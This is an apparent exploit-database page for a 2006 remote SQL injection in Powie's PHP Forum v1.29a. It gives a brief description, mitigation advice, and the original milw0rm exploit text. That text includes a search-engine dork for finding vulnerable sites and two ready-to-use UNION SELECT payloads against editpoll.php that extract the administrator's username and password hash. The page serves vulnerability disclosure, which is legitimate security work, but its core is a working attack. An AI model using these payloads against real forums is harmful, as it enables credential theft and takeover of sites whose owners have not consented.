Powie's PHP Forum - exploit.company

vendor:

PForum

by:

SHiKaA

N/A

CVSS

N/A

SQL Injection

CWE

Product Name: PForum

Affected Version From: v1.29a

Affected Version To: v1.29a

Patch Exists: NO

Related CWE: N/A

CPE: a:powie:pforum:1.29a

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Powie’s PHP Forum <= v1.29a (editpoll) Remote SQL Injection Exploit

The vulnerability exists due to insufficient sanitization of user-supplied input in 'editpoll.php' script. A remote attacker can send a specially crafted HTTP request with malicious SQL statements to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to bypass authentication and gain access to the administrative panel.

Mitigation:

Input validation should be used to prevent SQL injection attacks. It is also recommended to use parameterized queries instead of dynamic SQL queries.

Source

Exploit-DB raw data:

#==============================================================================================
#Powie's PHP Forum <= v1.29a (editpoll) Remote SQL Injection Exploit
#===============================================================================================
#                                                                     
#Critical Level : Dangerous                                           
#                                                                     
#Venedor site : http://www.powie.de    
#                                                                     
#Version : v1.29a
#
#===============================================================================================
#
#DORK : "pForum 1.29a"  // ""Powie's PSCRIPT Forum 1.26"                                        
#                                                       
#
#Exploit :
#--------------------------------
#
#FOR USER : editpoll.php?id=-1 UNION SELECT null,null,username,null FROM pfuser where id=1
#FOR PASS : editpoll.php?id=-1 UNION SELECT null,null,pwd,null FROM pfuser where id=1
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : CaMpA , Coder-AZH@CKTEAM
==================================================================================================

# milw0rm.com [2006-11-17]